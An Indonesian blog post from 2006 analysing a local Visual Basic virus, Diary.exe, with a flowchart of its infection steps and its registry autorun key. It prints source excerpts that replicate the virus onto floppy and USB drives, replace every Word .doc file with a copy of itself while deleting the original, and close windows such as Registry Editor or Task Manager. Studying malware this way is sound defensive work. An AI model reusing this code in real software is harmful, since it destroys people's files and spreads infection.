- 13-3-06 -
$A little Words...
Penulis ingin menyampaikan bagaimana virus Diary.exe bekerja
dan tidak ada maksud untuk menyinggung atau menyakiti perasaan
korban - korban yang telah terinfeksi oleh virus ini.
Analisis Virus dalam Artikel ini mungkin bersifat sangat Dasar,
oleh karena itu Saya mohon maaf sebesar-besarnya jika ada kekurangan.
$Start...
>Diary.Exe adalah salah satu Virus (yang katanya cukup Berbahaya oleh Vaksin.com) buatan
Vxer (pembuat Virus) lokal. Virus ini dibuat dengan menggunakan Bahasa Visual Basic 6.0.
Menurut Norman AV, virus ini dikategorikan sebagai varian dari Virus Kangen yang sempat
tersebar beberapa waktu lalu. Saya tidak tahu mengapa disebut-sebut sebagai varian kangen,
apakah karena Icon yang dipilih adalah Icon MS-Word? atau karena sifatnya yg menginfeksi
file MS-WORD saja? Sampai saat ini saya belum tahu..
Yang pasti virus ini pertama kali disebarkan di Laboratorium Komputer di salah satu
Universitas yang ada di Depok.
>Virus Diary.Exe bekerja menggunakan algoritma (yang kurang-lebihnya) sebagai berikut :
|START EXECUTION|
|
| Create File Diary Seorang Newbie.txt |
|di folder %userprofile%\Application Data|
|
|Periksa apakah folder %ProgramFiles%\Common Files\System ada?|
| tidak ada
|------------------------------------------->|
ada| |
| Create file Explorer.Exe di folder | |Create file di folder %systemroot&\System32|
| %ProgramFiles%\Common Files\System |
|<-------------------------------------------|
|Infeksi key-key di Registry, Hidden file, Disableregistrytools, Dll|
|
|Periksa apakah folder %Program Files%\InstallShield Installation Information ada?|
| tidak ada
|------------------------------------------------>|
ada| |
| |Create folder %Program Files%\InstallShield Installation Information|
| |
|<------------------------------------------------|
|Create file Rsvdb.Exe ke %Program Files%\InstallShield Installation Information|
|
|Create file RegsvcChk.Exe ke folder %SystemRoot%|
|
|Create file Spoolsw.Exe ke folder %userprofile%\Application Data|
|
|Execute Regsvcchk.Exe|
|
|Execute Spoolsw.Exe|
|
|Deteksi dan hapus Virus Kangen All Varian di Komputer|
|
|Deteksi dan Infeksi semua File MS-Word (*.Doc) di Komputer|
|
|END EXECUTION|
>Semua file MS-Word yang terdeteksi akan diambil namanya, lalu sang virus akan meng-
gandakan dirinya menggunakan nama file tsb. Lalu bagaimana dengan file .Doc tersebut?
File tsb akan dihapus/didelete. Algoritma jahat inilah yang merugikan banyak user
komputer karena semua file .Docnya telah hilang.
>Berikut cuplikan dari Source Code Diary.Exe :
----------------------------Cut Here---------------------------------
Private Sub cek(path As String)
On Error Resume Next
If Right(path, 1) <> "\" Then
path = path + "\"
End If
Set fol = fso.getfolder(path)
Set fil = fol.Files
Set subfol = fol.subfolders
If fso.fileexists(path + "Diary.exe") = True Then
GoTo a
Else
Call copi("Diary.exe", path)
End If
a: For Each fil2 In fil
If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC" Then
desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
Call copi(desk1 + ".exe", path)
Kill fil2.path
End If
Next
For Each subfols In subfol
cek (subfols.path)
Next
End Sub
----------------------------Cut Here---------------------------------
----------------------------Cut Here---------------------------------
Private Sub Timer1_Timer()
On Error Resume Next
Call GetActiveWindowName
tutup
If InStr(tampung, "A:") <> 0 Then
cek ("A:")
End If
cari
If i > 0 Then
For j = 0 To i - 1
If desk(j) <> "" Then
If InStr(tampung, desk2(j)) <> 0 Then
cek (desk2(j))
End If
End If
Next
End If
End Sub
----------------------------Cut Here---------------------------------
>Algoritma tersebut adalah bagaimana Virus bisa mendeteksi dikala user sedang membuka
Removeable Drive (Disket, USB, Dll) dengan mengambil Window Captionnya. Hal ini tidak
akan berlaku bila user membukanya di lingkungan DOS (Command Prompt). Dengan cara itu pula
virus bisa menggandakan dirinya dan menyebarkannya lewat Floopy Disk atau USB Drive.
>Virus juga akan me-Minimize window-window yang mempunyai string "Registry Editor",
"Application Data", "WINDOWS", "WINNT", "Program Files", "Command Prompt, "DOS", "Task",
"Process", "System", "Hijack", dan "Kill". Berikut adalah code dari algortima tsb :
----------------------------Cut Here---------------------------------
Private Sub tutup()
If InStr(tampung, "Registry Editor") <> 0 Or InStr(tampung, "Application Data") <> 0 Or InStr(tampung, "WINDOWS") <> 0_
Or InStr(tampung, "WINNT") <> 0 Or InStr(tampung, "Program Files") <> 0 Or InStr(tampung, "Command Prompt") <> 0_
Or InStr(tampung, "DOS") <> 0 Or InStr(tampung, "Task") <> 0 Or InStr(tampung, "Process") <> 0 Or InStr(tampung, "System") <> 0_
Or InStr(tampung, "Hijack") <> 0 Or InStr(tampung, "Kill") <> 0 Then
CloseWindow GetForegroundWindow
End If
End Sub
----------------------------Cut Here---------------------------------
>Sebagai Virus pasti Diary.Exe juga memerlukan suatu method Autorun saat komputer Boot. Virus ini
menggunakan key di HKLM\Software\Microsoft\Windows\CurrentVersion\Run dengan value NvsSchd dan berisi
data %Program Files%\Common Files\System\Explorer.exe.
>Karena ketidaksempurnaan dalam penulisan program, maka virus ini hanya dapat berjalan di sistem operasi
Windows XP, 2000 atau 2003. Virus ini berukuran sekitar 60 Kb dan yang telah dikompresi berukuran 20 Kb
dengan menggunakan kompresi UPX.
$API Functions List...
>GetSystemDirectory
GetWindowText
GetDesktopWindow
GetTopWindow
CloseWindow
GetWindowText
GetForegroundWindow
FindWindow
SendMessage
$Advantages N Disadvantages...
>Virus berukuran cukup kecil
>Selain mem-blok akses, juga me-minimize window-window
>Virus tidak dapat berjalan di Windows 9x dan Me
>Teknik search file masih menggunakan FSO dan WSH
>Menghapus file korban
$End...
>Diary.Exe dapat dikatakan salah satu virus lokal berbahaya karena menghapus file-file MS-Word di Komputer yang
terinfeksi. Penyebaran virus ini masih rendah, Media penyebarannya melalui Disket dan USB Drive. Teknik searching
file .Doc menggunakan teknik file scripting object. Dan implementasi Key Registry menggunakan teknik Windows Scripting.
Demikian artikel sederhana ini, kurang atau lebihnya saya mohon maaf....
$Greetz...
>Myztx @ Myztx Soft. House.
>All member of Mail-list : EcHo, Jasakom, Yogyafree, ITCenter, Virologi, Balihack n the others.
>Spyro, Vaganci, Yanto, n All my Friends at 01 [2005] n 07 [2004].
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar